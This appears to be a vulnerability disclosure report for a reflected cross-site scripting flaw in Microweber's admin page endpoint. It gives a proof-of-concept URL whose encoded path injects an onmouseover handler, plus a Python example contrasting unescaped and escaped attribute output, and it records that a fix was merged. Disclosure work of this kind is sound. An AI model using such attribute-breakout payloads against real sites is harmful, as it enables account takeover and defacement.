Cross-site Scripting (XSS) - Reflected in microweber/microweber

Valid

Reported on Feb 19th 2022

Description

Hi, the endpoint https://demo.microweber.org/demo/admin/page is vulnerable to reflected Cross-Site Scripting.

Proof of Concept

  1. Navigate to the PoC URL: https://demo.microweber.org/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit

  2. Move the mouse over the page; an XSS alert popup appears.

(Log in if the site asks.)
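The PoC works because the URL-decoded path segment carries a double quote that closes an HTML attribute, so whatever follows becomes new attributes (onmouseover, style). The following Python illustration is added here and is not Microweber's code (the project is PHP): render_unsafe and render_safe are hypothetical templates that place the decoded segment into an href attribute, and event_handlers uses the standard-library HTML parser to list the inline event-handler attributes a browser would see in each case.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed from the URL-encoded path segment in the report. The web server
# decodes percent-encoding before the application sees the value.
ENCODED_SEGMENT = ("8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3b"
                   "width%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n")

def decoded_segment() -> str:
    """The path segment as the application receives it (percent-decoded)."""
    return unquote(ENCODED_SEGMENT)

def render_unsafe(page_id: str) -> str:
    """Hypothetical vulnerable template: the raw segment is interpolated
    straight into a double-quoted attribute, so an embedded '"' closes it."""
    return f'<a class="edit" href="/admin/page/{page_id}/edit">Edit</a>'

def render_safe(page_id: str) -> str:
    """Hardened form: encode for the attribute context. quote=True turns the
    embedded '"' into &quot;, so the attribute cannot be terminated early."""
    escaped = html.escape(page_id, quote=True)
    return f'<a class="edit" href="/admin/page/{escaped}/edit">Edit</a>'

class AttrCollector(HTMLParser):
    """Records every attribute name the parser finds on start tags."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)

def event_handlers(markup: str) -> list:
    """Attribute names beginning with 'on', i.e. inline event handlers that
    would execute script; an empty list means the breakout did not happen."""
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return [name for name in parser.names if name.startswith("on")]

if __name__ == "__main__":
    print(event_handlers(render_unsafe(decoded_segment())))  # ['onmouseover']
    print(event_handlers(render_safe(decoded_segment())))    # []
```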

Impact

Cross-site scripting attacks can lead to account takeover via cookie theft, temporary site defacement, redirection of users to attacker-controlled sites, etc.

We are processing your report and will contact the microweber team within 24 hours. 3 months ago
Peter Ivanov validated this vulnerability 3 months ago
Damanpreet has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on f7f5d4 3 months ago
Peter Ivanov has been awarded the fix bounty